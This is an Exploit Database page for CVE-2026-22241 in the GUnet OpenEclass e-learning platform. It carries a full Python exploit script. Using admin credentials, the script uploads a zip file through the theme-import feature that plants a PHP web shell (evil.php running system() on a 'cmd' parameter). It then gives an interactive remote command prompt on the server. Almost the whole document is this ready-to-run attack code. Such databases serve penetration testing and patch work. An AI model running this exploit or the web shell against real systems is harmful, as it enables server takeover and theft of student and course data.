This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING GUnet OpenEclass E-learning platform < 4.2 - Remote Code Execution (RCE) EDB-ID: 52519 CVE: 2026-22241 EDB Verified: Author: UNICO007X Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-04-29 Vulnerable App: # Exploit Title: GUnet OpenEclass E-learning platform < 4.2 - Remote Code Execution (RCE) # Date: 2026-01-08 # Exploit Author: Ashif Iqubal # Vendor Homepage: https://www.openeclass.org/ # Software Link: https://download.openeclass.org/files/4.1/ # Version: < 4.2 # Tested on: Debian Ubuntu (Apache/2.4.58, PHP 8.3.6, MySQL 8.0.40-0ubuntu0.24.04.1) # CVE: CVE-2026-22241 import os import sys import zipfile import requests import argparse from bs4 import BeautifulSoup from argparse import RawTextHelpFormatter RED = '\033[91m' GREEN = '\033[92m' YELLOW = '\033[93m' RESET = '\033[0m' ORANGE = '\033[38;5;208m' MALICIOUS_PAYLOAD = """\ <?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; } ?> """ def banner(): print(f'''{YELLOW} ┏━╸╻ ╻┏━╸ ┏━┓┏━┓┏━┓┏━┓ ┏━┓┏━┓┏━┓╻ ╻╺┓ ┃ ┃┏┛┣╸ ╺━╸┏━┛┃┃┃┏━┛┣━┓╺━╸┏━┛┏━┛┏━┛┗━┫ ┃ ┗━╸┗┛ ┗━╸ ┗━╸┗━┛┗━╸┗━┛ ┗━╸┗━╸┗━╸ ╹╺┻╸ {RED} Author: @Ashif1337 {RESET}''') def clean_server(openeclass,filename): print(f"{ORANGE}[+] Removing Backd00r...{RESET}") # Remove the uploaded files requests.get(f"{openeclass}/courses/theme_data/{filename}?cmd=rm%20{filename}") print(f"{GREEN}[+] Server cleaned successfully!{RESET}") def execute_command(openeclass, filename): while True: # Prompt for user input with "eclass" cmd = input(f"{RED}[{YELLOW}eClass{RED}]~> {RESET}") # Check if the command is 'quit', then break the loop if cmd.lower() == "quit": clean_server(openeclass,filename) print(f"{ORANGE}[+] Exiting...{RESET}") sys.exit() # Construct the URL with the user-provided command url = f"{openeclass}/courses/theme_data/{filename}?cmd={cmd}" # Execute the GET request try: response = requests.get(url) # Check if the request was successful if response.status_code == 200: # Print the response text print(f"{GREEN}{response.text}{RESET}") except requests.exceptions.RequestException as e: # Print any error that occurs during the request print(f"{RED}An error occurred: {e}{RESET}") def upload_web_shell(openeclass, username, password): login_url = f'{openeclass}/?login_page=1' login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php' # Login credentials payload = { 'next': '/main/portfolio.php', 'uname': f'{username}', 'pass': f'{password}', 'submit': 'Enter' } headers = { 'Referer': login_page_url, } # Use a session to ensure cookies are handled correctly with requests.Session() as session: # (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens session.get(login_page_url) # Post the login credentials response = session.post(login_url, headers=headers, data=payload) # Create a zip file containing the malicious payload zip_file_path = 'poc.zip' with zipfile.ZipFile(zip_file_path, 'w') as zipf: zipf.writestr('evil.php', MALICIOUS_PAYLOAD.encode()) # Get token token_url = session.get(f'{openeclass}/modules/admin/theme_options.php',allow_redirects=False) if token_url.status_code != 200 : print(f"{RED}[X] Invalid Administrator Password!{RESET}") print(f"{RED}[X] Exiting...{RESET}") return False upload_token = BeautifulSoup(token_url.text, 'html.parser').select_one('input[name="token"]')['value'] # Upload the zip file url = f'{openeclass}/modules/admin/theme_options.php' files = { 'themeFile': ('poc.zip', open(zip_file_path, 'rb'), 'application/zip'), 'import': (None, ''), 'token': (None, upload_token) } response = session.post(url, files=files) # Clean up the poc zip file os.remove(zip_file_path) # Check if the upload was successful if response.status_code == 200: print(f"{GREEN}[+] Payload uploaded successfully!{RESET}") print(f"{GREEN}[+] Type 'quit' to exit web shell!{RESET}") return True else: print(f"{RED}[X] Failed to upload payload.{RESET}") print(f"{RED}[X] Exiting...{RESET}") return False def main(): parser = argparse.ArgumentParser(description="Open eClass Unrestricted File Upload RCE Exploit [ CVE-2026-22241 ]\nExample: CVE-2026-22241.py -t http://127.0.0.1/openeclass -u admin -p adminpassword",formatter_class=RawTextHelpFormatter) parser.add_argument('-t', '--eclassUrl', required=True, help="Target URL of the Open eClass.") parser.add_argument('-u', '--username', required=True, help="Admin Username for login.") parser.add_argument('-p', '--password', required=True, help="Admin Password for login.") args = parser.parse_args() banner() # Running the main login and execute command function if upload_web_shell(args.eclassUrl, args.username, args.password): execute_command(args.eclassUrl, 'evil.php') if __name__ == "__main__": main() Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.